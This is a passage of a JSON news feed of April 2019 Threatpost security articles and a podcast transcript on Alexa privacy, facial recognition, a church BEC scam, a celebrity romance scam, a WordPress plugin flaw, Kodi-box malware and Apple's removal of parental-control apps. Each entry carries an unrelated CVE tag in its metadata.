apparently, geolocation data gets scooped up here. Because when people ask, Alexa, tell me what the weather forecast is, or Alexa, I\u2019m feeling like Chinese, is anybody delivering to my house, that type of thing. That necessarily, obviously, those local results have to be tied to geolocation data. So they\u2019re scooping up and harvesting and storing and logging GPS coordinates, in addition to sort of these random, other snippets. And so there were five different employees within Amazon that are working on this program, that basically came forward and said that they feel that nobody gave their consent for this and that it\u2019s too broad of an access for them to have. And then they actually on a whim, sort of plugged these coordinates into Google Maps and found that they could actually track somebody\u2019s place of business or their house, and even bring up a picture of that house. And through other means, actually identify who lives there, and then tie all this other information together and be able to create a very creative profile.\n\n**Tom: **I agree with you, Tara, I think that we need to be more concerned about the privacy that we hand over to these types of digital devices. And I\u2019m even more concerned now about the privacy issues that have surround geo-specific apps, where you\u2019re using an app and it understands where you\u2019re at and gives you sort of context-relevant information, and how that data is being used, and who\u2019s using it, and who\u2019s collecting it. When you think about Amazon, they\u2019re a much more potentially powerful company considering all the tentacles that it has into my buying and my data, and my home with their Alexa speakers.\n\n**Lindsey:**Yeah, that\u2019s a really good point. And I\u2019m curious too about the consent and notification side of all of this. I mean, did they have any response Tara about if they gave any notification that they were doing any of this at all? Is there anything on Amazon\u2019s website about this program?\n\n**Tara: **No, no, this was completely in the background until _Bloomberg _came forward with their report, they didn\u2019t acknowledge that it exists. And they just put out a statement saying, you know, we take privacy seriously. And saying, we limit, the number of people that have access to this, who are tasked with doing this as part of their job, and they\u2019re bound by, you know, all kinds of restrictions and things like that it\u2019s highly controlled.\n\n**Tom: **I gotta come back to the point where I feel like this is an area ripe for regulation. I\u2019m not pro regulation but I mean, if this is something that consumers are outraged about \u2013 I think there\u2019s got to be a GDPR type regulations that we\u2019re going to see here in the U.S. that that are going to impact the Facebook\u2019s and the Amazons in the world.\n\n**Tara: **Right and now, we have other types of privacy and sort of potentially intrusive privacy issues to worry about too \u2013 Lindsey, going back to some of the reporting you did this week, but with the facial recognition stuff is happening. You know that that seems like sort of the Wild West out there. There\u2019s no regulation around that.Right?\n\n**Lindsey: **Well, yeah, exactly. And the scary thing about that, too, is that a lot of the facial recognition applications out there are actually being used by the government. So by the Department of Homeland Security and by policemen and whatnot. But yeah, facial recognition came up in the headlines a bunch this week, because there\u2019s been two different incidents. The first was you guys may have heard the EU last week approved a massive biometrics database that would combine the data from law enforcement, from Border Patrol, and more for both EU and non US citizens. So there was that. And then there was another incident this week that occurred where a JetBlue passenger was boarding a flight. And she noticed that instead of scanning her boarding pass, or taking a look at her passport, she was directed to look into a camera, before being allowed on onto the jet bridge. So she was confused about what was going on and so tweeted at JetBlue. And it turns out, this was part of a Customs and Border Patrol program that\u2019s used in I think, 17 airports, where it uses facial recognition to identify passengers and let them through the gateway onto the plane. So her tweet went viral and kind of started this massive conversation about facial recognition and you know, if you can consent and where the data is coming from, how it\u2019s being shared. So that\u2019s been a really interesting story to cover, and kind of see the backlash and reaction to both of these incidents.\n\n**Tom: **I can relate to that. I recently traveled to Mexico, for a little vacation. And, I am seeing facial recognition more and more in my life. I think the interesting thing about your story, Lindsey, was also you wrote about consent, whether or not all of these facial recognition systems actually ask for consent and get consent, which they don\u2019t. But when I went to Mexico, we flew into Mexico, and then we went through customs in Mexico, and Mexico had immigration kiosks, where they asked for facial recognition and fingerprints, and to scan our passports, which \u2013 I was really creeped out. My son, who\u2019s 14 years old, I think probably is now part of the government database of fingerprints and facial recognition. It was kind of weird. Considering, you know, he\u2019d been off grid, perhaps I think for a while now, he\u2019s part of the system. And then we flew back into the United States. There was these huge immigration lines in the Boston Airport. And one of the things that we were able to do was to cut the line by using what was called a mobile passport app. And I didn\u2019t realize it but when you use the app, and you get to skip this, this huge onerous line that goes to basically more facial recognition kiosks for people coming into the United States. And the app itself was pretty slick. I mean, it\u2019s kind of funny, because I felt really good about using the app, because it allowed me to cut in line. But the app basically did a facial recognition, had me input my passport information, and basically, took my identity in this app. And, I was so eager to cut the line, I gotta admit, I kind of skipped over a lot of the terms of services. And it saved me about 45 minutes. And for the price of handing over my biometric data to the government and to this to this app.\n\n**Lindsey: **That experience brings up a really good point, because, I think that there definitely are benefits to facial recognition. Like, it\u2019s not all about this dire Orwellian society. I think it makes these processes so much more efficient. But I do think there\u2019s also a bunch of kind of privacy concerns that people expressed to me over the past week. And, Tom, like you were saying, consent and notification, but then also in terms of how the data is being secured, how it\u2019s being shared, and who\u2019s gaining access to that data. So I think that there\u2019s kind of a lot that goes into it. I know that we actually did a poll, a Threatpost poll, and half of the respondents, this kind of surprised me, but half of the respondents said that they don\u2019t believe consent is realistically possible when it comes to facial recognition. So I thought that was interesting, too, because if you think about some of the use cases where biometrics and facial recognition exists, if you have like a security camera, or surveillance camera that is using facial recognition, there\u2019s not a lot you can do to opt out of that except for avoiding that area.\n\n**Tom:**Well, I think you mentioned that the White House now has a zone where they use facial recognition. And right there, there\u2019s no way you can say no, you walk into that zone. And you\u2019re basically get put into a big database, and they cross reference it and figure out who you are.\n\n**Lindsey: **Right. So there\u2019s a lot that goes into that. And then when I was talking to a bunch of security people at the Electronic Frontier Foundation, as well, they were mentioning that there really needs to be regulation for all this. And there, there is one law that exists in Illinois, where it basically regulates the collection of biometric data without consent. But they think that there needs to be more. And in particular, regulation that impacts law enforcement, as opposed to just businesses which that law did. So I know, there\u2019s also been a new bill that was introduced in March, it was, what was it called, the Commercial Facial Recognition Privacy Act, that would have like more widespread implications for businesses in terms of how what kind of notification and consent they would need when they use facial recognition. So I think that\u2019s kind of a step in the right direction, but something to be looking out for.\n\n**Tom: **Yeah, facial recognition has been a creepy topic for a long time. But you know, as these GPUs get better, and these computers get better, and the efficiency of the compute behind them get better. It just becomes even creepier. I don\u2019t even think the tin foil hats will help protect you.\n\n**Lindsey: **So Tom, you also had an interesting story this week. I think it was about passwords being \u2013 I think it was 2 million passwords were \u2013 being exposed.\n\n**Tom: **Yeah. So I mean, we hear about these breach stories all the time. And I mean, there\u2019s probably like, since we\u2019ve been talking, there\u2019s probably been like three breaches, or should I say leaky servers and insecure data on the internet. And one of the things that I think is kind of interesting about the story is that the leaky data, it was tied to a China-based app manufacturer, called Wi Fi Finder. And researchers at GDI Foundation, found 2 million hotspots and passwords for those hotspots on the servers of this app, this Android app called WiFi Finder. And essentially, it\u2019s pretty straightforward. The app itself is an Android-based app, you can get it on Google Play. And it\u2019s one of many of apps that do the same thing. And that is essentially crowdsource on Wi-Fi hotspot data, and also pairing that information with passwords. So the idea is if your dataset is big enough, and you\u2019re wandering around with this app on your phone, you can find a hotspot, and you can authenticate to that hotspot, and you don\u2019t have to ask anybody for a Wi-Fi password. Now, the data that was found on the servers was pretty extensive in the sense that it wasn\u2019t just commercial businesses. So you know, you go to Starbucks, you go to your local gym, or you go to, you know, a bookstore or something like that, you know, you have these public Wi Fi hotspots with a password that you may have to ask for, you may have to look for. And what was happening was that people were crowdsourcing private companies that were not, generally publicly accessible. And for some odd reason, and this really wasn\u2019t explained very well in the reporting, of the research, was that there was a massive, massive amount of Wi-Fi hotspots that were owned by home users like consumers. And so you would you basically had a lot of a lot of password information and a lot of hotspots by consumers in their homes. And the concern there is, is that in a commercial setting, or even in a sort of a public business, publicly accessible hotspot, there are protections put in place to prevent people from messing with the router configurations and accessing some of the some of the settings within the router. But as if you have access to a home router, those security measures are not in place. And there was no documented cases of hacking, but the concern was there regarding that type of information being available to anybody that had access to this leaky server.\n\n**Lindsey:**I feel like we keep seeing this issue of insecure databases and these accidental exposures, which, obviously are different from a malicious breach. I\u2019m curious if there\u2019s something that can be done to prevent this for people who own these databases. I mean, Tom, did you talk to anyone, any experts who had any recommendations about how to better secure databases and kind of what the underlying problem is here?\n\n**Tom: **I did talk to a couple experts on this one. And, you know, the advice is always the same.In terms of leaky data on servers, it doesn\u2019t change much. Just make sure you configure your servers correctly, and make sure that they\u2019re not accessible to the public. I mean, there\u2019s a couple strategies that you can apply to that. I think one of the one of the other suggestions was the way in which some of these publicly accessible sites providing and offer Wi-Fi, and that would be more or less not an open Wi-Fi, not an insecure Wi-Fi, but things that use tokens and allow and divvy out Wi-Fi to individuals using a specific time delineated username and a unique password. And that way, it would basically render all of these apps useless, because there would be a unique username and a unique password, that would timeout within a certain period of time, which would really create a much more secure public Wi-Fi experience. And that was really the suggestion. And that was really what the experts were saying that I talked to regarding the blowback on this story.\n\n**Lindsey: **Well, I\u2019m feeling sufficiently like I need more privacy right now. Maybe we should wrap up now, Tom and Tara, thanks for taking the time and really interesting discussion today.\n\n**Tara: **Yeah. Thanks, Lindsay. Thanks, Tom.\n\n**Tom: **Yeah, have a great weekend. Have a great weekend.\n\n**Lindsey: **Catch us next week on the Threatpost podcast.\n\nFor direct download, [click here](<http://traffic.libsyn.com/digitalunderground/NEWS_WRAP_FINAL.mp3>).\n", "modified": "2019-04-26T17:57:36", "published": "2019-04-26T17:57:36", "id": "THREATPOST:FE41B3825C6A9EE91B00CDADD2AF9147", "href": "https://threatpost.com/threatpost-news-wrap-podcast-for-apr-26/144144/", "type": "threatpost", "title": "News Wrap: Amazon Echo Privacy, Facebook FTC Fines and Biometrics Regulation", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:57:09", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "A church in Brunswick, Ohio was scammed out of a whopping $1.75 million as a result of a business email compromise (BEC) attack.\n\nSt. Ambrose Catholic Parish, which has around 16,000 members, has been working on a massive $4 million church renovation, dubbed \u201cVision 20/20\u201d \u2013 but attackers figured out a way to hack into the church\u2019s email system, take control of two church employee accounts, and eventually divert payments related to the project to a fraudulent account owned by them.\n\nAccording to [local reports](<https://www.cleveland.com/crime/2019/04/email-hackers-steal-175-million-from-st-ambrose-catholic-parish-in-brunswick.html>), the church said in a letter to parishioners over the weekend that it was notified of the issue on April 17, after the construction company behind the renovations contacted the church saying it had missed payments on the project.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cOn Wednesday, Marous Brothers called inquiring as to why we had not paid our monthly payment on the project for the past two months, totaling approximately $1,750,000,\u201d according to an email sent by the church to parishioners. \u201cThis was shocking news to us, as we have been very prompt on our payments every month and have received all the appropriate confirmations from the bank that the wire transfers of money to Marous were executed/confirmed.\u201d\n\nAfter involving the Brunswick police and the FBI, the church discovered that their email system was hacked and that bad actors had taken control of two employee email accounts.\n\nUsing these two hacked accounts, the attackers were able to pretend they were the email accounts\u2019 real owners, and deceived other employees into believing Marous Brothers had changed their bank and wiring instructions. The $1.75 million in church payments for two months were then sent to a fraudulent bank account owned by the cybercriminals.\n\n\u201cThe money was then swept out by the perpetrators before anyone knew what had happened,\u201d according to the church. \u201cNeedless to say, this was very distressing information.\u201d\n\nThe church said it is currently working with the FBI and its insurance company to try to recover the stolen funds. Meanwhile, it said, no other data \u2013 such as databases with parishioner information or church financial information \u2013 has been compromised.\n\nBEC scams continue to plague companies as attackers become more advanced \u2013 particularly as infamous BEC groups like [London Blue](<https://threatpost.com/bec-scam-gang-london-blue-evolves-tactics-targets/143440/>), [Scarlet Widow](<https://threatpost.com/rsac-2019-bec-scammer-gang-takes-aim-at-boy-scouts-other-nonprofts/142302/>) and others continue honing their techniques.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/30112714/FBI-IC3-11.png>)\n\n[According to](<https://threatpost.com/fbi-bec-scam-losses-double/144038/>) the FBI\u2019s annual Internet Crime Report (IC3) for 2018, BEC scams ultimately drained victims of over $1.2 billion last year. For contrast, in 2017, BEC attacks resulted in adjusted losses of $675 million.\n\nSt. Ambrose Catholic Parish isn\u2019t the first high-profile community case, either. The FBI in its report said it received a complaint from a town in New Jersey that fell victim of a BEC scam \u2014 and transferred over $1 million to a fraudulent account (the FBI was able to freeze the funds and return the money to the town). Individuals suffer too: In another case, a BEC victim received a email purporting to be from their closing agent during a real-estate transaction \u2014 resulting in the person initiating a wire transfer of $50,000 to a fraudster\u2019s bank account located in New York.\n\nRonnie Tokazowski, senior threat researcher at Agari, told Threatpost in a recent interview there are several steps that firms \u2013 and individuals \u2013 can take to protect against BEC scams.\n\n\u201cFor BEC protections, there are several things that organizations and individuals can do to not fall victim,\u201d he said. \u201cFirstly, implementing a DMARC [which stands for Domain-based Message Authentication, Reporting and Conformance and is an email authentication protocol] solution can help organizations look at the reputation of senders who may be spoofing their CEO\u2019s, asking for wire transfers or gift card. For individuals, being informed about the different types of scams that actors are using can be helpful as well.\u201d\n", "modified": "2019-04-30T16:21:59", "published": "2019-04-30T16:21:59", "id": "THREATPOST:2BDC072802830F0CC831DE4C4F1FA580", "href": "https://threatpost.com/bec-hack-cons-catholic-church/144212/", "type": "threatpost", "title": "BEC Hack Cons Catholic Church Out of $1.75 Million", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:51:48", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "English actor Jason Statham \u2013 a.k.a. \u201cthe Transporter\u201d \u2013 is cozying up to people who like his Facebook page \u2013 or at least, someone purporting to be him is.\n\nA fraudster managed to bilk a vulnerable and unsuspecting Statham fan out of a \u201csignificant amount\u201d of money after approaching her while she was perusing a fan page for the actor on Facebook.\n\n\u201cShe thought it was nice that the actor had seemingly embraced \u2018talking to his fans,\u2019 and she admitted that she was also in a vulnerable place after recently losing her mother and fianc\u00e9,\u201d explained researchers at Tripwire, who flagged the incident in a [Monday post](<https://www.tripwire.com/state-of-security/latest-security-news/fraudster-posed-as-jason-statham-to-prey-upon-star-struck-users/>). \u201cShe therefore felt no unease when the fraudster asked her to talk with them over WhatsApp.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nA truly bad romance ensued, with hundreds of WhatsApp messages flying between the two over the course of months, during with Faux Statham professed his undying love: \u201cWill you love me and be the special woman beside me for the rest of your life honey\u201d reads one of the messages.\n\nAfter a pattern of trust was established, the supposed action-hero actor started to complain about financial difficulties due to a delayed film payment: \u201cI really need you to do this for me honey \u2019cause I can\u2019t trust anyone but you with my money honey.\u201d\n\nThe victim proceeded to send Western Union an undisclosed sum, after which the supposed Statham disappeared.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/30163632/Statham-fraud.png>)\n\nSource: BBC\n\nAs detective constable Craig Moylon of the Greater Manchester Police in the UK [told the BBC](<https://www.bbc.com/news/uk-england-manchester-47969165>), \u201cThis lady has been subject to somebody who just tricked her at a very vulnerable time in her life. When you see the relentless messaging that this lady got from this person and you see the grooming and the exploitation\u2026 the impact is extraordinary.\u201d\n\nThe gullibility of the victim stood out to Tyler Reguly, manager of security R&amp;D at Tripwire. He linked it to generational and cultural norms.\n\n\u201cThis is typically what I find most surprising about [successful scams](<https://threatpost.com/godaddy-shutters-subdomains-snake-oil/144147/>),\u201d he told Threatpost in an interview. \u201cThere\u2019s a desire to believe, no matter how unlikely the scenario. We\u2019re a society of dreamers \u2013 \u2018I can win the lottery,\u2019 \u2018I can marry Celebrity X,\u2019 \u2018I can perform on stage alongside Singer Y\u2019 \u2013 and unfortunately, modern generations are being brought up to put even more belief in their dreams. So, while we have more tech savvy individuals, we have more potential targets for these criminals.\u201d\n\nThis scam also highlights the ingenuity of bad actors who prey upon unsuspecting users on social media, according to Tripwire.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/30164155/Jason-Statham-008.jpg>)\n\n\u201cI would suspect that they setup a fan page for a celebrity and then contacted people via that fan page, claiming to be the celebrity,\u201d Reguly said. \u201cAlternatively, they may have been looking for people who publicly \u2018liked\u2019 a real Jason Statham page and reached out to those users, which is why it is important to verify the identity of those sending messages before you respond. In the case of the former, Facebook has done a great job of providing verified pages (similar to Twitter\u2019s verified users) that make it easy to tell when you\u2019re looking at a page associated with a known entity. (Specifically: \u2018A blue verification badge confirms that this is an authentic Page for this public figure, media company or brand\u2019).\u201d\n\nThese types of scams are on the rise, precisely because they\u2019re successful.\n\n\u201cI\u2019d be willing to wager that it is starting to become relatively common,\u201d Reguly said. \u201cPeople tend to have a soft spot for celebrities, we see people stand in line for hours to catch a glimpse of their favorite star filming, or pay hundreds of dollars for a quick handshake and autograph at conventions. We have a desire to connect with people who have had a meaningful impact in our lives, and that is quite commonly celebrities, particularly those that filled a role near and dear to our hearts or that sung a song that has always stuck with us\u2026.These scams work because we want to believe.\u201d\n", "modified": "2019-04-30T21:24:20", "published": "2019-04-30T21:24:20", "id": "THREATPOST:1925DCFAF239C5B25D21852DB978E8E9", "href": "https://threatpost.com/fake-jason-statham-fan-money/144247/", "type": "threatpost", "title": "Fake Jason Statham Bilks a Fan Out of Serious Money", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:52:16", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "Half of respondents in a recent Threatpost poll said that they don\u2019t believe consent realistically exists when it comes to real-life facial recognition.\n\nThe [recent poll](<https://threatpost.com/poll-creeped-out-facial-recognition/144084/>) of 170 readers comes as facial recognition applications [continue to pop up](<https://threatpost.com/facial-recognition-are-we-ready/144066/>) in the real world \u2013 from airports to police forces. While biometrics certainly has advantages \u2013 such as making identification more efficient \u2013 gaining consent from people whose biometrics are being taken remains a mystery to some, with 53 percent of respondents saying they don\u2019t believe that consent exists or is possible in real-life facial recognition applications .\n\nIn the poll, 32 percent more respondents said that consent will be the act of giving people notification that an area is using facial recognition; and only 10 percent said consent is the ability to opt out of facial recognition applications.\n\nThe issue of biometrics consent came to the forefront again in December when the Department of Homeland Security unveiled a facial-recognition pilot program for monitoring public areas surrounding the [White House](<https://threatpost.com/white-house-facial-recognition-pilot-raises-privacy-alarms/139649/>). When asked about consent, the department said that the public cannot opt-out of the pilot, except by avoiding the areas that will be filmed as part of the program.\n\n\u201cA very weak form of protection is if the government or a business [that uses biometrics for] surveillance, they notify people,\u201d Adam Schwartz, senior staff attorney with the Electronic Frontier Foundation\u2019s civil liberties team, told Threatpost. \u201cWe think this is not consent \u2013 real consent is where they don\u2019t aim a camera at you.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/25163405/consent.png>)\n\nBeyond consent, more than half of poll respondents said that they have negative feelings toward facial recognition due to issues related to privacy and security \u2013 while 30 percent more said they have \u201cmixed\u201d feelings, understanding both the benefits and privacy concerns.\n\nWhen asked what concerns them the most about real-world facial applications, 55 percent of those surveyed pointed to privacy and surveillance issues, while 29 percent said the security of biometrics information and how the data is shared.\n\nDespite these concerns, biometrics continues to gain traction, with the EU last week [approving](<https://www.securityresearch-cou.eu/sites/default/files/02.Rinkens.Secure%20safe%20societies_EU%20interoperability_4-3_v1.0.pdf>) a massive biometrics database for both EU and non-EU citizens. The EU\u2019s approval of the database, called the \u201cCommon Identity Repository,\u201d will aim to connect the systems used by border control, migration and law-enforcement agencies.\n\nAs biometrics continue to increase, meanwhile, up to 85 percent of respondents said that they think that facial recognition should be regulated in the future.\n\nSuch laws exist or are being discussed as it relates to consent: An [Illinois law](<http://www.ilga.gov/legislation/ilcs/ilcs3.asp?ActID=3004&ChapterID=57>) for instance regulates collection of biometric information (including for facial recognition) without consent.\n\nHowever, that law only applies to businesses and not law enforcement. Meanwhile, a new bill introduced in the Senate in [March](<https://www.schatz.senate.gov/imo/media/doc/SIL19337.pdf>), the \u201cCommercial Facial Recognition Privacy Act,\u201d would bar businesses that are using facial recognition from harvesting and sharing user data without consent.\n\n\u201cThe time to regulate and restrict the use of facial recognition technology is now, before it becomes embedded in our everyday lives,\u201d said Jason Kelly, digital strategist with EFF, in a [recent post](<https://www.eff.org/deeplinks/2019/04/skip-surveillance-opting-out-face-recognition-airports>). \u201cGovernment agencies and airlines have ignored years of warnings from privacy groups and Senators that using face recognition technology on travelers would massively violate their privacy. Now, the passengers are in revolt as well, and they\u2019re demanding answers.\u201d\n", "modified": "2019-04-26T12:10:15", "published": "2019-04-26T12:10:15", "id": "THREATPOST:677D5A0A56D06021C8EF30D0361579C6", "href": "https://threatpost.com/facial-recognition-consent-doesnt-exist-threatpost-poll-finds/144126/", "type": "threatpost", "title": "Facial Recognition 'Consent\u2019 Doesn\u2019t Exist, Threatpost Poll Finds", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:52:08", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "UPDATE\n\nA vulnerability in a popular WordPress plugin called the WooCommerce Checkout Manager extension is potentially putting more than 60,000 websites at risk, researchers say.\n\nThe WooCommerce Checkout Manager plugin allows WooCommerce users to customize and manage the fields on their checkout pages. The plugin, owned by Visser Labs, is separate from the WooCommerce plugin, which is owned by Automattic.\n\nAs of Monday, an update for WooCommerce Checkout Manager is available (version 4.3) that patches the vulnerability. That can be downloaded [here](<https://wordpress.org/support/topic/upgrade-to-4-3/>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cEarlier this week, an arbitrary file upload vulnerability has been found in popular WordPress plugin WooCommerce Checkout Manager which extends the functionality of well known WooCommerce plugin,\u201d said Luka Sikic, with WebArx Security in a [Thursday post](<https://www.webarxsecurity.com/woocommerce-checkout-manager/>).\n\nVisser Labs has not responded to a request for comment from Threatpost. On Friday, the plugin has been removed from the WordPress plugin repository. \u201cThis plugin was closed on April 26, 2019 and is no longer available for download,\u201d according to a [notice](<https://wordpress.org/plugins/woocommerce-checkout-manager/>) on the site. However, that still leaves the 60,000 websites who have already downloaded and are utilizing the plugin open to attack, according to researchers.\n\nOn Tuesday, Plugin Vulnerabilities published a proof of concept outlining an attack on an arbitrary file upload vulnerability in WooCommerce Checkout Manager. The disclosed vulnerability exists because the plugin\u2019s \u201cCategorize Uploaded Files\u201d option does not check privileges or permissions before files are uploaded. As a result, bad actors could upload \u2013 and then execute \u2013 malicious files.\n\n\u201cSince there is no privilege or permission check before uploading a file, the exploitation of the vulnerability in WooCommerce Checkout Manager is simple and doesn\u2019t require an attacker to be registered on the site,\u201d Sikic said.\n\nThe number of vulnerable plugins being exploited in a massive campaign is racking up, with the WooCommerce Checkout Manager the latest plugin to be exploited.\n\nThe WooCommerce Checkout Manager is only the latest plugin to have a disclosed vulnerability, researchers say.\n\n\u201cWe continue to see an increase in the number of plugins attacked as part of a campaign that\u2019s been active for quite a long time,\u201d according to John Castro with Sucuri in a recent [post](<https://blog.sucuri.net/2019/04/plugins-added-to-malicious-campaign.html>). \u201cBad actors have added more vulnerable plugins to inject similar malicious scripts.\u201d\n\nOther plugins recently added to the attack include WP Inventory Manager and Woocommerce User Email Verification. That\u2019s on top of others, including Social Warfare, [Yellow Pencil Visual Theme Customizer](<https://threatpost.com/wordpress-yellow-pencil-plugin-exploited/143729/>), and [Yuzo Related Posts](<https://threatpost.com/wordpress-urges-users-to-uninstall-yuzo-plugin-after-flaw-exploited/143710/>).\n\nResearchers urged plugin users to disable the plugin completely or disable the \u201cCategorize Uploaded Files\u201d option on the plugin settings page.\n\n\u201cAttackers are trying to exploit vulnerable versions of these plugins,\u201d said Castro. \u201cPublic exploits already exist for all of the components listed above, and we highly encourage you to keep your software up to date to prevent any infection.\u201d\n\n_This article was updated on April 30 at 8 a.m. ET to reflect that the vulnerability has now been patched._\n", "modified": "2019-04-26T19:44:55", "published": "2019-04-26T19:44:55", "id": "THREATPOST:33026719684C7CD1B70B04B1CFFE2AEB", "href": "https://threatpost.com/users-urged-to-disable-wordpress-plugin-after-unpatched-flaw-disclosed/144159/", "type": "threatpost", "title": "Users Urged to Update WordPress Plugin After Flaw Disclosed", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:51:57", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "You get what you pay for when you pirate content. That\u2019s the takeaway from the latest report by Digital Citizens Alliance.\n\nIt found that pirating hardware, which enables free streaming copyright-protected content, comes packed with malicious malware. The devices give criminals easy access to router settings, can plant malware on shared network devices and are often leveraged to steal user credentials.\n\nAccording to the [Digital Citizens Alliance report](<https://www.digitalcitizensalliance.org/clientuploads/directory/Reports/DCA_Fishing_in_the_Piracy_Stream_v6.pdf>) (PDF), 13 percent of 2,073 Americans surveyed use a hardware device for pirating content. One such popular device is called a \u201cKodi box,\u201d which is sold for between $70 to $100 on grey markets. Kodi is an open-source media player designed for televisions and developed by the XBMC Foundation. The software is widely known for its support of a bevy of copyright-infringing apps that offer free access to premium content from Netfix, Amazon Prime, Hulu, sports networks and paid subscription music services. \n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cBy plugging the device into a home network, [users] are enabling hackers to bypass the security (such as a router\u2019s firewall) designed to protect their system. If apps on the box or that are later downloaded have malware, the user has helped the hacker past network security,\u201d wrote Digital Citizens Alliance (DCA) in a recently released report.\n\nIn a review of hardware and pirating apps, such as FreeNetflix, researchers said they found malware piggybacking on illegal apps and preloaded with content. For example, when researchers installed a live sports streaming app called Mobdro, the app forwarded the researcher\u2019s Wi-Fi network name and password to a server in Indonesia.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/29154055/Jailbroken-Firestick-image.png>)\n\nExample of a jail broken Amazon Fire TV Stick for sale. Courtesy: Digital Citizens Alliance\n\nIn other instances, 1.5 terabytes of data was uploaded from a device that shared the same network of the Kodi box. And, in yet another instance, \u201cresearchers uncovered a clever scheme that enabled criminals to pose as well-known streaming sites, such as Netflix, to facilitate illegal access to a legitimate subscription of an actual Netflix subscriber,\u201d according to the report.\n\nFor its investigation DCA partnered with GroupSense, a security firm that specializes in chatrooms that facilitate black market sales. It claims hackers were discussing how to leverage networks compromised by illicit media streaming services in hopes of recruiting them into DDoS botnets or to mine cryptocurrency.\n\n\u201cGiven that users rarely install anti-virus tools on such devices, the opportunities for exploitation are numerous,\u201d wrote researchers.\n\nThe unsavory worlds of [pirated content and malware are no strangers](<https://threatpost.com/searches-for-pirated-content-lead-to-pain-and-little-gain/113515/>). Researchers have [long warned that patronizing such](<https://threatpost.com/passteal-malware-lurking-file-sharing-sites-112112/77239/>) services is a shortcut to infection. Earlier this month, [Kaspersky Lab released a report](<https://threatpost.com/game-of-thrones-malware-piracy/143318/>) that found that illegal downloads of HBO\u2019s Game of Thrones accounted for 17 percent of all infected pirated content in the last year.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/29154327/Firestick-Apps.png>)\n\nExamples of apps running on the Kodi platform.\n\nIn [Aug. 2018 researchers at ESET](<https://www.welivesecurity.com/2018/09/13/kodi-add-ons-launch-cryptomining-campaign/>) said they found DDoS modules had been added to a Kodi third-party add-on. ESET said it also found copyright-infringing apps that came with multi-stage crypto-mining malware that targeted Windows and Linux systems.\n\nAs part of its report, DCA reached out to XBMC Foundation. XBMC quickly rebuffed any notion it tacitly supported or endorsed pirated content. \u201cIf you are selling a box on your website designed to trick users into thinking broken add-ons come from us and work perfectly, so you can make a buck, we\u2019re going to do everything we can to stop you,\u201d it told DCA.\n\nThe Kodi application typically runs on a wide range of hardware and is sold by independent resellers on eBay, Facebook Marketplace and Craigslist. DCA said it also found Kodi pre-installed on a number of devices including inexpensive China-made media streamers. The software can also be found on devices, that were sold pre-sideloaded with Kodi software. Users can also choose to install the Kodi application on existing hardware.\n\nTo be clear, the Kodi software is not illicit. Rather, researchers are concerned the Kodi platform supports pirating apps that can harbor malware. Researchers are also concerned that some hardware devices that are sold as \u201cKodi boxes\u201d come pre-installed with malicious code and apps used to pirate streaming content.\n\nDCA did its own independent testing over the course of 500 hours of lab testing. It estimates there are 12 million active users of the illicit devices in North American homes. Those users \u201cpresent a tempting target because they offer hackers a new avenue to exploit consumers and a path to reach other devices on a home network. The findings should serve as a wake-up call for consumers, the technology community, and policymakers to take the threat seriously,\u201d it said.\n", "modified": "2019-04-29T20:31:30", "published": "2019-04-29T20:31:30", "id": "THREATPOST:3E89058B621DF5B431A387D18E4F398C", "href": "https://threatpost.com/kodi_box_malware/144191/", "type": "threatpost", "title": "Malware Infests Popular Pirate Streaming Hardware", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T12:00:27", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "Apple is defending its decision to take down several highly popular parental control apps amidst a firestorm of backlash, saying it did so for \u201cprivacy and security\u201d reasons.\n\nApple came under scrutiny this weekend after a New York Times article alleged that the phone giant had unfairly removed or restricted at least 11 top screen-time and parental-control apps from its marketplace \u2013 after creating its own screen-time app. Among those that have been removed are OurPact, which has 3 million downloads, and Mobicip, which has 2.5 million downloads.\n\nWhile it looks like a competitive move, Apple tells a different story: Its aim was to weed out apps that were using mobile device management (MDM) technology it said, which gives third-party control and access over other devices and sensitive information, including location, app use and more. Parental-control apps, which allow parents to keep tabs (and set limits) on their children\u2019s on-phone activities, locations and more, are thus effectively collecting way too much data, Apple said.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cWe recently removed several parental-control apps from the App Store, and we did it for a simple reason: They put users\u2019 privacy and security at risk. It\u2019s important to understand why and how this happened,\u201d the company said in a [Sunday statement](<https://www.apple.com/newsroom/2019/04/the-facts-about-parental-control-apps/>), entitled \u201cThe Facts About Parental Control Apps.\u201d\n\nRegardless of the reason, the incident has raised questions about how competition is handled between apps and the sometimes-competing platforms that they are sold on. Impacted app developers, for their part, continue to be up-in-arms regarding the incident \u2013 with two popular parental control apps, Kidslox and Qustodio, last week filing an anti-competition complaint with the European Commission\u2019s competition office.\n\n## Angry App Devs\n\nThe Saturday[ report](<https://www.nytimes.com/2019/04/27/technology/apple-screen-time-trackers.html>) by the New York Times_, _working with app data firm Sensor Tower, shows that Apple has removed or restricted 11 of the 17 